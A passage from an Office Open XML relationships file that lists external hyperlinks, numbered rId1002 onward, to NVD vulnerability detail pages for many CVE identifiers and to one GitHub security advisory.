Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81985" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81986" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81987" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81988" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81989" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81990" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81992" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82005" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82006" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82007" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83498" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83942" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83952" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83954" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83955" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83959" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83967" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83968" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83969" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83970" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83971" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83972" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83973" TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83974" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83975" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83976" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83977" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83978" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83979" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83980" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83981" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83982" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83983" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83985" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83986" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83987" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83995" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85983" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9034" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18167" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19304" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19306" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19397" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53553" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63464" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66767" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69683" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73267" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73315" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75033" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75569" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76640" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77909" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78623" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79750" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81832" TargetMode="External" Id="rId1060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82537" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84361" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86207" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9040" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-298h-jpq4-m665" TargetMode="External" Id="rId1065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-46418" TargetMode="External" Id="rId1066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77110" TargetMode="External" Id="rId1067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79749" TargetMode="External" Id="rId1068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82020" TargetMode="External" Id="rId1069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId1070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85533" TargetMode="External" Id="rId1071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86073" TargetMode="External" Id="rId1072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-44320" TargetMode="External" Id="rId1073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0860" TargetMode="External" Id="rId1074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12483" TargetMode="External" Id="rId1075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13297" TargetMode="External" Id="rId1076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16025" TargetMode="External" Id="rId1077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16037" TargetMode="External" Id="rId1078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16497" TargetMode="External" Id="rId1079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18056" TargetMode="External" Id="rId1080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18672" TargetMode="External" Id="rId1081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18916" TargetMode="External" Id="rId1082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19080" TargetMode="External" Id="rId1083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19118" TargetMode="External" Id="rId1084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19205" TargetMode="External" Id="rId1085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19300" TargetMode="External" Id="rId1086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19305" TargetMode="External" Id="rId1087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19401" TargetMode="External" Id="rId1088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19538" TargetMode="External" Id="rId1089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19858" TargetMode="External" Id="rId1090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26456" TargetMode="External" Id="rId1091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28604" TargetMode="External" Id="rId1092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3174" TargetMode="External" Id="rId1093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38344" TargetMode="External" Id="rId1094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38347" TargetMode="External" Id="rId1095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47625" TargetMode="External" Id="rId1096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48888" TargetMode="External" Id="rId1097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52770" TargetMode="External" Id="rId1098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54598" TargetMode="External" Id="rId1099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54599" TargetMode="External" Id="rId1100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55215" TargetMode="External" Id="rId1101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55552" TargetMode="External" Id="rId1102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55784" TargetMode="External" Id="rId1103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57098" TargetMode="External" Id="rId1104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57099" TargetMode="External" Id="rId1105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62759" TargetMode="External" Id="rId1106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62813" TargetMode="External" Id="rId1107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66304" TargetMode="External" Id="rId1108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66307" TargetMode="External" Id="rId1109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId1110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68887" TargetMode="External" Id="rId1111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69329" TargetMode="External" Id="rId1112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69342" TargetMode="External" Id="rId1113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69378" TargetMode="External" Id="rId1114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69397" TargetMode="External" Id="rId1115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69428" TargetMode="External" Id="rId1116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69429" TargetMode="External" Id="rId1117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69443" TargetMode="External" Id="rId1118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69514" TargetMode="External" Id="rId1119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69539" TargetMode="External" Id="rId1120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69587" TargetMode="External" Id="rId1121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69588" TargetMode="External" Id="rId1122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69599" TargetMode="External" Id="rId1123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69607" TargetMode="External" Id="rId1124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69631" TargetMode="External" Id="rId1125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69710" TargetMode="External" Id="rId1126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69739" TargetMode="External" Id="rId1127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69744" TargetMode="External" Id="rId1128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69760" TargetMode="External" Id="rId1129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69793" TargetMode="External" Id="rId1130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69803" TargetMode="External" Id="rId1131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69804" TargetMode="External" Id="rId1132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69805" TargetMode="External" Id="rId1133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69809" TargetMode="External" Id="rId1134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId1135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId1136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId1137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69929" TargetMode="External" Id="rId1138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69930" TargetMode="External" Id="rId1139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70065" TargetMode="External" Id="rId1140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70124" TargetMode="External" Id="rId1141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70570" TargetMode="External" Id="rId1142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70579" TargetMode="External" Id="rId1143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70587" TargetMode="External" Id="rId1144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId1145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72923" TargetMode="External" Id="rId1146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId1147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72932" TargetMode="External" Id="rId1148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72943" TargetMode="External" Id="rId1149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72949" TargetMode="External" Id="rId1150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72954" TargetMode="External" Id="rId1151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72989" TargetMode="External" Id="rId1152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId1153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75465" TargetMode="External" Id="rId1154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75998" TargetMode="External" Id="rId1155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76956" TargetMode="External" Id="rId1156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77101" TargetMode="External" Id="rId1157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77102" TargetMode="External" Id="rId1158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77103" TargetMode="External" Id="rId1159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77104" TargetMode="External" Id="rId1160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77108" TargetMode="External" Id="rId1161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77124" TargetMode="External" Id="rId1162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId1163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId1164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId1165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" 